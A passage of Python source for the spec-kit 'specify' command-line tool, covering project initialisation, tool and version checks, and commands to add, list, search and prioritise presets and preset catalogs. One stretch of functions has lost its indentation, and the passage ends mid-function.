                        if cmds_dir.exists():
                            try:
                                shutil.rmtree(cmds_dir)
                            except OSError:
                                # Best-effort cleanup: skills are already installed,
                                # so leaving stale commands is non-fatal.
                                console.print("[yellow]Warning: could not remove extracted commands directory[/yellow]")
            if not no_git:
                tracker.start("git")
                if is_git_repo(project_path):
                    tracker.complete("git", "existing repo detected")
                elif should_init_git:
                    success, error_msg = init_git_repo(project_path, quiet=True)
                    if success:
                        tracker.complete("git", "initialized")
                    else:
                        tracker.error("git", "init failed")
                        git_error_message = error_msg
                else:
                    tracker.skip("git", "git not available")
            else:
                tracker.skip("git", "--no-git flag")
            # Persist the CLI options so later operations (e.g. preset add)
            # can adapt their behaviour without re-scanning the filesystem.
            # Must be saved BEFORE preset install so _get_skills_dir() works.
            save_init_options(project_path, {
                "ai": selected_ai,
                "ai_skills": ai_skills,
                "ai_commands_dir": ai_commands_dir,
                "here": here,
                "preset": preset,
                "script": selected_script,
                "speckit_version": get_speckit_version(),
            })
            # Install preset if specified
            if preset:
                try:
                    from .presets import PresetManager, PresetCatalog, PresetError
                    preset_manager = PresetManager(project_path)
                    speckit_ver = get_speckit_version()
                    # Try local directory first, then catalog
                    local_path = Path(preset).resolve()
                    if local_path.is_dir() and (local_path / "preset.yml").exists():
                        preset_manager.install_from_directory(local_path, speckit_ver)
                    else:
                        preset_catalog = PresetCatalog(project_path)
                        pack_info = preset_catalog.get_pack_info(preset)
                        if not pack_info:
                            console.print(f"[yellow]Warning:[/yellow] Preset '{preset}' not found in catalog. Skipping.")
                        else:
                            try:
                                zip_path = preset_catalog.download_pack(preset)
                                preset_manager.install_from_zip(zip_path, speckit_ver)
                                # Clean up downloaded ZIP to avoid cache accumulation
                                try:
                                    zip_path.unlink(missing_ok=True)
                                except OSError:
                                    # Best-effort cleanup; failure to delete is non-fatal
                                    pass
                            except PresetError as preset_err:
                                console.print(f"[yellow]Warning:[/yellow] Failed to install preset '{preset}': {preset_err}")
                except Exception as preset_err:
                    console.print(f"[yellow]Warning:[/yellow] Failed to install preset: {preset_err}")
            tracker.complete("final", "project ready")
        except Exception as e:
            tracker.error("final", str(e))
            console.print(Panel(f"Initialization failed: {e}", title="Failure", border_style="red"))
            if debug:
                _env_pairs = [
                    ("Python", sys.version.split()[0]),
                    ("Platform", sys.platform),
                    ("CWD", str(Path.cwd())),
                ]
                _label_width = max(len(k) for k, _ in _env_pairs)
                env_lines = [f"{k.ljust(_label_width)} → [bright_black]{v}[/bright_black]" for k, v in _env_pairs]
                console.print(Panel("\n".join(env_lines), title="Debug Environment", border_style="magenta"))
            # Edge case: only delete a directory WE created; never remove the
            # user's current directory in --here mode.
            if not here and project_path.exists():
                shutil.rmtree(project_path)
            raise typer.Exit(1)
        finally:
            pass
    console.print(tracker.render())
    console.print("\n[bold green]Project ready.[/bold green]")
    # Show git error details if initialization failed
    if git_error_message:
        console.print()
        git_error_panel = Panel(
            f"[yellow]Warning:[/yellow] Git repository initialization failed\n\n"
            f"{git_error_message}\n\n"
            f"[dim]You can initialize git manually later with:[/dim]\n"
            f"[cyan]cd {project_path if not here else '.'}[/cyan]\n"
            f"[cyan]git init[/cyan]\n"
            f"[cyan]git add .[/cyan]\n"
            f"[cyan]git commit -m \"Initial commit\"[/cyan]",
            title="[red]Git Initialization Failed[/red]",
            border_style="red",
            padding=(1, 2)
        )
        console.print(git_error_panel)
    # Agent folder security notice
    agent_config = AGENT_CONFIG.get(selected_ai)
    if agent_config:
        agent_folder = ai_commands_dir if selected_ai == "generic" else agent_config["folder"]
        if agent_folder:
            security_notice = Panel(
                f"Some agents may store credentials, auth tokens, or other identifying and private artifacts in the agent folder within your project.\n"
                f"Consider adding [cyan]{agent_folder}[/cyan] (or parts of it) to [cyan].gitignore[/cyan] to prevent accidental credential leakage.",
                title="[yellow]Agent Folder Security[/yellow]",
                border_style="yellow",
                padding=(1, 2)
            )
            console.print()
            console.print(security_notice)
    steps_lines = []
    if not here:
        steps_lines.append(f"1. Go to the project folder: [cyan]cd {project_name}[/cyan]")
        step_num = 2
    else:
        steps_lines.append("1. You're already in the project directory!")
        step_num = 2
    # Add Codex-specific setup step if needed
    if selected_ai == "codex":
        codex_path = project_path / ".codex"
        quoted_path = shlex.quote(str(codex_path))
        if os.name == "nt": # Windows
            cmd = f"setx CODEX_HOME {quoted_path}"
        else: # Unix-like systems
            cmd = f"export CODEX_HOME={quoted_path}"
        steps_lines.append(f"{step_num}. Set [cyan]CODEX_HOME[/cyan] environment variable before running Codex: [cyan]{cmd}[/cyan]")
        step_num += 1
    steps_lines.append(f"{step_num}. Start using slash commands with your AI agent:")
    steps_lines.append(" 2.1 [cyan]/speckit.constitution[/] - Establish project principles")
    steps_lines.append(" 2.2 [cyan]/speckit.specify[/] - Create baseline specification")
    steps_lines.append(" 2.3 [cyan]/speckit.plan[/] - Create implementation plan")
    steps_lines.append(" 2.4 [cyan]/speckit.tasks[/] - Generate actionable tasks")
    steps_lines.append(" 2.5 [cyan]/speckit.implement[/] - Execute implementation")
    steps_panel = Panel("\n".join(steps_lines), title="Next Steps", border_style="cyan", padding=(1,2))
    console.print()
    console.print(steps_panel)
    enhancement_lines = [
        "Optional commands that you can use for your specs [bright_black](improve quality & confidence)[/bright_black]",
        "",
        "○ [cyan]/speckit.clarify[/] [bright_black](optional)[/bright_black] - Ask structured questions to de-risk ambiguous areas before planning (run before [cyan]/speckit.plan[/] if used)",
        "○ [cyan]/speckit.analyze[/] [bright_black](optional)[/bright_black] - Cross-artifact consistency & alignment report (after [cyan]/speckit.tasks[/], before [cyan]/speckit.implement[/])",
        "○ [cyan]/speckit.checklist[/] [bright_black](optional)[/bright_black] - Generate quality checklists to validate requirements completeness, clarity, and consistency (after [cyan]/speckit.plan[/])"
    ]
    enhancements_panel = Panel("\n".join(enhancement_lines), title="Enhancement Commands", border_style="cyan", padding=(1,2))
    console.print()
    console.print(enhancements_panel)
@app.command()
def check():
    """Report which supported tools (git, agent CLIs, VS Code) are installed.

    Edge cases: the pseudo-agent ``generic`` is excluded from the scan;
    IDE-based agents (``requires_cli`` false) are skipped rather than
    probed and are never counted as "found". Missing tools only produce
    tips at the end — this command never exits with an error status.
    """
    show_banner()
    console.print("[bold]Checking for installed tools...[/bold]\n")
    tracker = StepTracker("Check Available Tools")
    tracker.add("git", "Git version control")
    git_ok = check_tool("git", tracker=tracker)
    agent_results = {}
    for agent_key, agent_config in AGENT_CONFIG.items():
        if agent_key == "generic":
            continue # Generic is not a real agent to check
        agent_name = agent_config["name"]
        requires_cli = agent_config["requires_cli"]
        tracker.add(agent_key, agent_name)
        if requires_cli:
            agent_results[agent_key] = check_tool(agent_key, tracker=tracker)
        else:
            # IDE-based agent - skip CLI check and mark as optional
            tracker.skip(agent_key, "IDE-based, no CLI check")
            agent_results[agent_key] = False # Don't count IDE agents as "found"
    # Check VS Code variants (not in agent config)
    tracker.add("code", "Visual Studio Code")
    check_tool("code", tracker=tracker)
    tracker.add("code-insiders", "Visual Studio Code Insiders")
    check_tool("code-insiders", tracker=tracker)
    console.print(tracker.render())
    console.print("\n[bold green]Specify CLI is ready to use![/bold green]")
    if not git_ok:
        console.print("[dim]Tip: Install git for repository management[/dim]")
    if not any(agent_results.values()):
        console.print("[dim]Tip: Install an AI assistant for the best experience[/dim]")
@app.command()
def version():
    """Display CLI version, latest template release, and platform details.

    Edge cases: when package metadata is unavailable (e.g. running from a
    source checkout) the CLI version falls back to reading
    ``pyproject.toml``; if that also fails it stays "unknown". Any network
    or parsing failure while fetching the latest GitHub release leaves the
    template version/date as "unknown" instead of raising — this command
    always succeeds.
    """
    import platform
    import importlib.metadata
    show_banner()
    # Get CLI version from package metadata
    cli_version = "unknown"
    try:
        cli_version = importlib.metadata.version("specify-cli")
    except Exception:
        # Fallback: try reading from pyproject.toml if running from source
        try:
            import tomllib
            pyproject_path = Path(__file__).parent.parent.parent / "pyproject.toml"
            if pyproject_path.exists():
                with open(pyproject_path, "rb") as f:
                    data = tomllib.load(f)
                cli_version = data.get("project", {}).get("version", "unknown")
        except Exception:
            pass
    # Fetch latest template release version
    repo_owner = "github"
    repo_name = "spec-kit"
    api_url = f"https://api.github.com/repos/{repo_owner}/{repo_name}/releases/latest"
    template_version = "unknown"
    release_date = "unknown"
    try:
        response = client.get(
            api_url,
            timeout=10,
            follow_redirects=True,
            headers=_github_auth_headers(),
        )
        if response.status_code == 200:
            release_data = response.json()
            template_version = release_data.get("tag_name", "unknown")
            # Remove 'v' prefix if present
            if template_version.startswith("v"):
                template_version = template_version[1:]
            release_date = release_data.get("published_at", "unknown")
            if release_date != "unknown":
                # Format the date nicely
                try:
                    dt = datetime.fromisoformat(release_date.replace('Z', '+00:00'))
                    release_date = dt.strftime("%Y-%m-%d")
                except Exception:
                    pass
    except Exception:
        pass
    info_table = Table(show_header=False, box=None, padding=(0, 2))
    info_table.add_column("Key", style="cyan", justify="right")
    info_table.add_column("Value", style="white")
    info_table.add_row("CLI Version", cli_version)
    info_table.add_row("Template Version", template_version)
    info_table.add_row("Released", release_date)
    info_table.add_row("", "")
    info_table.add_row("Python", platform.python_version())
    info_table.add_row("Platform", platform.system())
    info_table.add_row("Architecture", platform.machine())
    info_table.add_row("OS Version", platform.version())
    panel = Panel(
        info_table,
        title="[bold cyan]Specify CLI Information[/bold cyan]",
        border_style="cyan",
        padding=(1, 2)
    )
    console.print(panel)
    console.print()
# ===== Extension Commands =====
# Sub-command group wiring. Each typer.Typer() below is a command *group*;
# nesting them with add_typer yields the CLI paths:
#   specify extension ...           (extension_app)
#   specify extension catalog ...   (catalog_app)
#   specify preset ...              (preset_app)
#   specify preset catalog ...      (preset_catalog_app)
# NOTE: both nested groups share the name "catalog"; they do not clash
# because each is registered under a different parent group.
extension_app = typer.Typer(
    name="extension",
    help="Manage spec-kit extensions",
    add_completion=False,
)
app.add_typer(extension_app, name="extension")
catalog_app = typer.Typer(
    name="catalog",
    help="Manage extension catalogs",
    add_completion=False,
)
extension_app.add_typer(catalog_app, name="catalog")
preset_app = typer.Typer(
    name="preset",
    help="Manage spec-kit presets",
    add_completion=False,
)
app.add_typer(preset_app, name="preset")
preset_catalog_app = typer.Typer(
    name="catalog",
    help="Manage preset catalogs",
    add_completion=False,
)
preset_app.add_typer(preset_catalog_app, name="catalog")
def get_speckit_version() -> str:
    """Return the installed specify-cli version string.

    Edge cases: when the package metadata is missing (running from a
    source checkout), the version is read from ``pyproject.toml`` three
    directories above this module; if that file is absent, lacks a
    ``project.version`` key, or cannot be parsed, the function swallows
    the error and returns the literal string "unknown" — it never raises.
    """
    import importlib.metadata

    try:
        return importlib.metadata.version("specify-cli")
    except Exception:
        pass
    # Fallback for source checkouts: read the version out of pyproject.toml.
    try:
        import tomllib

        candidate = Path(__file__).parent.parent.parent / "pyproject.toml"
        if candidate.exists():
            with candidate.open("rb") as fh:
                project_meta = tomllib.load(fh)
            return project_meta.get("project", {}).get("version", "unknown")
    except Exception:
        # Intentionally ignore any errors while reading/parsing pyproject.toml;
        # the "unknown" fallback below covers every failure mode.
        pass
    return "unknown"
# ===== Preset Commands =====
@preset_app.command("list")
def preset_list():
from .presets import PresetManager
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = PresetManager(project_root)
installed = manager.list_installed()
if not installed:
console.print("[yellow]No presets installed.[/yellow]")
console.print("\nInstall a preset with:")
console.print(" [cyan]specify preset add <pack-name>[/cyan]")
return
console.print("\n[bold cyan]Installed Presets:[/bold cyan]\n")
for pack in installed:
status = "[green]enabled[/green]" if pack.get("enabled", True) else "[red]disabled[/red]"
pri = pack.get('priority', 10)
console.print(f" [bold]{pack['name']}[/bold] ({pack['id']}) v{pack['version']} — {status} — priority {pri}")
console.print(f" {pack['description']}")
if pack.get("tags"):
tags_str = ", ".join(pack["tags"])
console.print(f" [dim]Tags: {tags_str}[/dim]")
console.print(f" [dim]Templates: {pack['template_count']}[/dim]")
console.print()
@preset_app.command("add")
def preset_add(
pack_id: str = typer.Argument(None, help="Preset ID to install from catalog"),
from_url: str = typer.Option(None, "--from", help="Install from a URL (ZIP file)"),
dev: str = typer.Option(None, "--dev", help="Install from local directory (development mode)"),
priority: int = typer.Option(10, "--priority", help="Resolution priority (lower = higher precedence, default 10)"),
):
from .presets import (
PresetManager,
PresetCatalog,
PresetError,
PresetValidationError,
PresetCompatibilityError,
)
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Validate priority
if priority < 1:
console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
raise typer.Exit(1)
manager = PresetManager(project_root)
speckit_version = get_speckit_version()
try:
if dev:
dev_path = Path(dev).resolve()
if not dev_path.exists():
console.print(f"[red]Error:[/red] Directory not found: {dev}")
raise typer.Exit(1)
console.print(f"Installing preset from [cyan]{dev_path}[/cyan]...")
manifest = manager.install_from_directory(dev_path, speckit_version, priority)
console.print(f"[green]✓[/green] Preset '{manifest.name}' v{manifest.version} installed (priority {priority})")
elif from_url:
# Validate URL scheme before downloading
from urllib.parse import urlparse as _urlparse
_parsed = _urlparse(from_url)
_is_localhost = _parsed.hostname in ("localhost", "127.0.0.1", "::1")
if _parsed.scheme != "https" and not (_parsed.scheme == "http" and _is_localhost):
console.print(f"[red]Error:[/red] URL must use HTTPS (got {_parsed.scheme}://). HTTP is only allowed for localhost.")
raise typer.Exit(1)
console.print(f"Installing preset from [cyan]{from_url}[/cyan]...")
import urllib.request
import urllib.error
import tempfile
with tempfile.TemporaryDirectory() as tmpdir:
zip_path = Path(tmpdir) / "preset.zip"
try:
with urllib.request.urlopen(from_url, timeout=60) as response:
zip_path.write_bytes(response.read())
except urllib.error.URLError as e:
console.print(f"[red]Error:[/red] Failed to download: {e}")
raise typer.Exit(1)
manifest = manager.install_from_zip(zip_path, speckit_version, priority)
console.print(f"[green]✓[/green] Preset '{manifest.name}' v{manifest.version} installed (priority {priority})")
elif pack_id:
catalog = PresetCatalog(project_root)
pack_info = catalog.get_pack_info(pack_id)
if not pack_info:
console.print(f"[red]Error:[/red] Preset '{pack_id}' not found in catalog")
raise typer.Exit(1)
if not pack_info.get("_install_allowed", True):
catalog_name = pack_info.get("_catalog_name", "unknown")
console.print(f"[red]Error:[/red] Preset '{pack_id}' is from the '{catalog_name}' catalog which is discovery-only (install not allowed).")
console.print("Add the catalog with --install-allowed or install from the preset's repository directly with --from.")
raise typer.Exit(1)
console.print(f"Installing preset [cyan]{pack_info.get('name', pack_id)}[/cyan]...")
try:
zip_path = catalog.download_pack(pack_id)
manifest = manager.install_from_zip(zip_path, speckit_version, priority)
console.print(f"[green]✓[/green] Preset '{manifest.name}' v{manifest.version} installed (priority {priority})")
finally:
if 'zip_path' in locals() and zip_path.exists():
zip_path.unlink(missing_ok=True)
else:
console.print("[red]Error:[/red] Specify a preset ID, --from URL, or --dev path")
raise typer.Exit(1)
except PresetCompatibilityError as e:
console.print(f"[red]Compatibility Error:[/red] {e}")
raise typer.Exit(1)
except PresetValidationError as e:
console.print(f"[red]Validation Error:[/red] {e}")
raise typer.Exit(1)
except PresetError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
@preset_app.command("remove")
def preset_remove(
pack_id: str = typer.Argument(..., help="Preset ID to remove"),
):
from .presets import PresetManager
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
manager = PresetManager(project_root)
if not manager.registry.is_installed(pack_id):
console.print(f"[red]Error:[/red] Preset '{pack_id}' is not installed")
raise typer.Exit(1)
if manager.remove(pack_id):
console.print(f"[green]✓[/green] Preset '{pack_id}' removed successfully")
else:
console.print(f"[red]Error:[/red] Failed to remove preset '{pack_id}'")
raise typer.Exit(1)
@preset_app.command("search")
def preset_search(
query: str = typer.Argument(None, help="Search query"),
tag: str = typer.Option(None, "--tag", help="Filter by tag"),
author: str = typer.Option(None, "--author", help="Filter by author"),
):
from .presets import PresetCatalog, PresetError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
catalog = PresetCatalog(project_root)
try:
results = catalog.search(query=query, tag=tag, author=author)
except PresetError as e:
console.print(f"[red]Error:[/red] {e}")
raise typer.Exit(1)
if not results:
console.print("[yellow]No presets found matching your criteria.[/yellow]")
return
console.print(f"\n[bold cyan]Presets ({len(results)} found):[/bold cyan]\n")
for pack in results:
console.print(f" [bold]{pack.get('name', pack['id'])}[/bold] ({pack['id']}) v{pack.get('version', '?')}")
console.print(f" {pack.get('description', '')}")
if pack.get("tags"):
tags_str = ", ".join(pack["tags"])
console.print(f" [dim]Tags: {tags_str}[/dim]")
console.print()
@preset_app.command("resolve")
def preset_resolve(
template_name: str = typer.Argument(..., help="Template name to resolve (e.g., spec-template)"),
):
from .presets import PresetResolver
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
resolver = PresetResolver(project_root)
result = resolver.resolve_with_source(template_name)
if result:
console.print(f" [bold]{template_name}[/bold]: {result['path']}")
console.print(f" [dim](from: {result['source']})[/dim]")
else:
console.print(f" [yellow]{template_name}[/yellow]: not found")
console.print(" [dim]No template with this name exists in the resolution stack[/dim]")
@preset_app.command("info")
def preset_info(
pack_id: str = typer.Argument(..., help="Preset ID to get info about"),
):
from .extensions import normalize_priority
from .presets import PresetCatalog, PresetManager, PresetError
project_root = Path.cwd()
specify_dir = project_root / ".specify"
if not specify_dir.exists():
console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
console.print("Run this command from a spec-kit project root")
raise typer.Exit(1)
# Check if installed locally first
manager = PresetManager(project_root)
local_pack = manager.get_pack(pack_id)
if local_pack:
console.print(f"\n[bold cyan]Preset: {local_pack.name}[/bold cyan]\n")
console.print(f" ID: {local_pack.id}")
console.print(f" Version: {local_pack.version}")
console.print(f" Description: {local_pack.description}")
if local_pack.author:
console.print(f" Author: {local_pack.author}")
if local_pack.tags:
console.print(f" Tags: {', '.join(local_pack.tags)}")
console.print(f" Templates: {len(local_pack.templates)}")
for tmpl in local_pack.templates:
console.print(f" - {tmpl['name']} ({tmpl['type']}): {tmpl.get('description', '')}")
repo = local_pack.data.get("preset", {}).get("repository")
if repo:
console.print(f" Repository: {repo}")
license_val = local_pack.data.get("preset", {}).get("license")
if license_val:
console.print(f" License: {license_val}")
console.print("\n [green]Status: installed[/green]")
# Get priority from registry
pack_metadata = manager.registry.get(pack_id)
priority = normalize_priority(pack_metadata.get("priority") if isinstance(pack_metadata, dict) else None)
console.print(f" [dim]Priority:[/dim] {priority}")
console.print()
return
# Fall back to catalog
catalog = PresetCatalog(project_root)
try:
pack_info = catalog.get_pack_info(pack_id)
except PresetError:
pack_info = None
if not pack_info:
console.print(f"[red]Error:[/red] Preset '{pack_id}' not found (not installed and not in catalog)")
raise typer.Exit(1)
console.print(f"\n[bold cyan]Preset: {pack_info.get('name', pack_id)}[/bold cyan]\n")
console.print(f" ID: {pack_info['id']}")
console.print(f" Version: {pack_info.get('version', '?')}")
console.print(f" Description: {pack_info.get('description', '')}")
if pack_info.get("author"):
console.print(f" Author: {pack_info['author']}")
if pack_info.get("tags"):
console.print(f" Tags: {', '.join(pack_info['tags'])}")
if pack_info.get("repository"):
console.print(f" Repository: {pack_info['repository']}")
if pack_info.get("license"):
console.print(f" License: {pack_info['license']}")
console.print("\n [yellow]Status: not installed[/yellow]")
console.print(f" Install with: [cyan]specify preset add {pack_id}[/cyan]")
console.print()
@preset_app.command("set-priority")
def preset_set_priority(
    pack_id: str = typer.Argument(help="Preset ID"),
    priority: int = typer.Argument(help="New priority (lower = higher precedence)"),
):
    """Change the template-resolution priority of an installed preset.

    Edge cases:
    - Exits 1 when run outside a spec-kit project (no ``.specify/`` directory).
    - Exits 1 for priorities below 1 (must be a positive integer).
    - Exits 1 if the preset is not installed, or if its registry entry is
      missing or not a dict (corrupted state).
    - Exits 0 as a no-op only when the stored priority is already an *int*
      equal to the requested value; a corrupted stored value (e.g. the
      string "high") is still rewritten even when the requested priority
      equals its normalized fallback.
    """
    from .presets import PresetManager
    project_root = Path.cwd()
    # Check if we're in a spec-kit project
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    # Validate priority
    if priority < 1:
        console.print("[red]Error:[/red] Priority must be a positive integer (1 or higher)")
        raise typer.Exit(1)
    manager = PresetManager(project_root)
    # Check if preset is installed
    if not manager.registry.is_installed(pack_id):
        console.print(f"[red]Error:[/red] Preset '{pack_id}' is not installed")
        raise typer.Exit(1)
    # Get current metadata
    metadata = manager.registry.get(pack_id)
    if metadata is None or not isinstance(metadata, dict):
        console.print(f"[red]Error:[/red] Preset '{pack_id}' not found in registry (corrupted state)")
        raise typer.Exit(1)
    from .extensions import normalize_priority
    raw_priority = metadata.get("priority")
    # Only skip if the stored value is already a valid int equal to requested priority
    # This ensures corrupted values (e.g., "high") get repaired even when setting to default (10)
    if isinstance(raw_priority, int) and raw_priority == priority:
        console.print(f"[yellow]Preset '{pack_id}' already has priority {priority}[/yellow]")
        raise typer.Exit(0)
    old_priority = normalize_priority(raw_priority)
    # Update priority
    manager.registry.update(pack_id, {"priority": priority})
    console.print(f"[green]✓[/green] Preset '{pack_id}' priority changed: {old_priority} → {priority}")
    console.print("\n[dim]Lower priority = higher precedence in template resolution[/dim]")
# ===== Preset Catalog Commands =====
@preset_catalog_app.command("list")
def preset_catalog_list():
    """List active preset catalogs and report which config source is in use.

    Edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - Exits 1 if the active catalog stack fails validation
      (``PresetValidationError`` from ``get_active_catalogs``).
    - The ``SPECKIT_PRESET_CATALOG_URL`` environment variable takes
      precedence in the config-source report; otherwise the project config
      is checked first, then the user config, then built-in defaults.
    - A config file that exists but fails to load (raises
      ``PresetValidationError``) is treated the same as a missing one for
      reporting purposes.
    """
    from .presets import PresetCatalog, PresetValidationError
    project_root = Path.cwd()
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    catalog = PresetCatalog(project_root)
    try:
        active_catalogs = catalog.get_active_catalogs()
    except PresetValidationError as e:
        console.print(f"[red]Error:[/red] {e}")
        raise typer.Exit(1)
    console.print("\n[bold cyan]Active Preset Catalogs:[/bold cyan]\n")
    for entry in active_catalogs:
        install_str = (
            "[green]install allowed[/green]"
            if entry.install_allowed
            else "[yellow]discovery only[/yellow]"
        )
        console.print(f"  [bold]{entry.name}[/bold] (priority {entry.priority})")
        if entry.description:
            console.print(f"    {entry.description}")
        console.print(f"    URL: {entry.url}")
        console.print(f"    Install: {install_str}")
        console.print()
    config_path = project_root / ".specify" / "preset-catalogs.yml"
    user_config_path = Path.home() / ".specify" / "preset-catalogs.yml"
    if os.environ.get("SPECKIT_PRESET_CATALOG_URL"):
        console.print("[dim]Catalog configured via SPECKIT_PRESET_CATALOG_URL environment variable.[/dim]")
    else:
        try:
            proj_loaded = config_path.exists() and catalog._load_catalog_config(config_path) is not None
        except PresetValidationError:
            proj_loaded = False
        if proj_loaded:
            console.print(f"[dim]Config: {config_path.relative_to(project_root)}[/dim]")
        else:
            try:
                user_loaded = user_config_path.exists() and catalog._load_catalog_config(user_config_path) is not None
            except PresetValidationError:
                user_loaded = False
            if user_loaded:
                console.print("[dim]Config: ~/.specify/preset-catalogs.yml[/dim]")
            else:
                console.print("[dim]Using built-in default catalog stack.[/dim]")
                console.print(
                    "[dim]Add .specify/preset-catalogs.yml to customize.[/dim]"
                )
@preset_catalog_app.command("add")
def preset_catalog_add(
    url: str = typer.Argument(help="Catalog URL (must use HTTPS)"),
    name: str = typer.Option(..., "--name", help="Catalog name"),
    priority: int = typer.Option(10, "--priority", help="Priority (lower = higher priority)"),
    install_allowed: bool = typer.Option(
        False, "--install-allowed/--no-install-allowed",
        help="Allow presets from this catalog to be installed",
    ),
    description: str = typer.Option("", "--description", help="Description of the catalog"),
):
    """Append a preset catalog entry to .specify/preset-catalogs.yml.

    Edge cases:
    - Exits 1 outside a spec-kit project (no ``.specify/`` directory).
    - Exits 1 if the URL fails catalog-URL validation (HTTPS required).
    - A missing config file starts from an empty config; an existing file
      that cannot be parsed as YAML exits 1 (it is never overwritten).
    - Exits 1 if the config's ``catalogs`` key exists but is not a list.
    - Exits 1 on a duplicate catalog name (case-sensitive match); the user
      is told to remove it first or pick another name.
    - ``install_allowed`` defaults to False, i.e. new catalogs are
      discovery-only unless explicitly enabled.
    """
    from .presets import PresetCatalog, PresetValidationError
    project_root = Path.cwd()
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    # Validate URL
    tmp_catalog = PresetCatalog(project_root)
    try:
        tmp_catalog._validate_catalog_url(url)
    except PresetValidationError as e:
        console.print(f"[red]Error:[/red] {e}")
        raise typer.Exit(1)
    config_path = specify_dir / "preset-catalogs.yml"
    # Load existing config
    if config_path.exists():
        try:
            config = yaml.safe_load(config_path.read_text()) or {}
        except Exception as e:
            console.print(f"[red]Error:[/red] Failed to read {config_path}: {e}")
            raise typer.Exit(1)
    else:
        config = {}
    catalogs = config.get("catalogs", [])
    if not isinstance(catalogs, list):
        console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
        raise typer.Exit(1)
    # Check for duplicate name
    for existing in catalogs:
        if isinstance(existing, dict) and existing.get("name") == name:
            console.print(f"[yellow]Warning:[/yellow] A catalog named '{name}' already exists.")
            console.print("Use 'specify preset catalog remove' first, or choose a different name.")
            raise typer.Exit(1)
    catalogs.append({
        "name": name,
        "url": url,
        "priority": priority,
        "install_allowed": install_allowed,
        "description": description,
    })
    config["catalogs"] = catalogs
    config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
    install_label = "install allowed" if install_allowed else "discovery only"
    console.print(f"\n[green]✓[/green] Added catalog '[bold]{name}[/bold]' ({install_label})")
    console.print(f"  URL: {url}")
    console.print(f"  Priority: {priority}")
    console.print(f"\nConfig saved to {config_path.relative_to(project_root)}")
@preset_catalog_app.command("remove")
def preset_catalog_remove(
    name: str = typer.Argument(help="Catalog name to remove"),
):
    """Remove a named preset catalog from .specify/preset-catalogs.yml.

    Edge cases:
    - Exits 1 outside a spec-kit project, when no config file exists, when
      the file cannot be parsed, when ``catalogs`` is not a list, or when
      no entry named ``name`` is found.
    - The survivor filter also drops malformed (non-dict) entries as a side
      effect, so the rewritten file is cleaner than the input.
    - Emptying the list is allowed; a note explains built-in defaults then
      apply.

    NOTE(review): because non-dict entries are pruned by the same filter,
    the length comparison can report success (entry "removed") even when no
    entry actually matched ``name`` — confirm this is intended.
    """
    project_root = Path.cwd()
    specify_dir = project_root / ".specify"
    if not specify_dir.exists():
        console.print("[red]Error:[/red] Not a spec-kit project (no .specify/ directory)")
        console.print("Run this command from a spec-kit project root")
        raise typer.Exit(1)
    config_path = specify_dir / "preset-catalogs.yml"
    if not config_path.exists():
        console.print("[red]Error:[/red] No preset catalog config found. Nothing to remove.")
        raise typer.Exit(1)
    try:
        config = yaml.safe_load(config_path.read_text()) or {}
    except Exception:
        console.print("[red]Error:[/red] Failed to read preset catalog config.")
        raise typer.Exit(1)
    catalogs = config.get("catalogs", [])
    if not isinstance(catalogs, list):
        console.print("[red]Error:[/red] Invalid catalog config: 'catalogs' must be a list.")
        raise typer.Exit(1)
    original_count = len(catalogs)
    catalogs = [c for c in catalogs if isinstance(c, dict) and c.get("name") != name]
    if len(catalogs) == original_count:
        console.print(f"[red]Error:[/red] Catalog '{name}' not found.")
        raise typer.Exit(1)
    config["catalogs"] = catalogs
    config_path.write_text(yaml.dump(config, default_flow_style=False, sort_keys=False))
    console.print(f"[green]✓[/green] Removed catalog '{name}'")
    if not catalogs:
        console.print("\n[dim]No catalogs remain in config. Built-in defaults will be used.[/dim]")
# ===== Extension Commands =====
def _resolve_installed_extension(
    argument: str,
    installed_extensions: list,
    command_name: str = "command",
    allow_not_found: bool = False,
) -> tuple[Optional[str], Optional[str]]:
    """Resolve a user argument to an installed extension's ``(id, name)``.

    Resolution order and edge cases:
    - An exact ID match always wins, even when other installed extensions
      share the same display name.
    - Display-name matching is case-insensitive; a unique match resolves
      to that extension's real ID.
    - An ambiguous display name (multiple case-insensitive matches) prints
      a candidate table plus a retry hint using ``command_name`` and exits
      1 — callers never observe the ambiguity.
    - No match at all: returns ``(None, None)`` when ``allow_not_found`` is
      True, otherwise prints a not-installed error and exits 1.
    """
    from rich.table import Table
    # First, try exact ID match
    for ext in installed_extensions:
        if ext["id"] == argument:
            return (ext["id"], ext["name"])
    # If not found by ID, try display name match
    name_matches = [ext for ext in installed_extensions if ext["name"].lower() == argument.lower()]
    if len(name_matches) == 1:
        # Unique display-name match
        return (name_matches[0]["id"], name_matches[0]["name"])
    elif len(name_matches) > 1:
        # Ambiguous display-name match
        console.print(
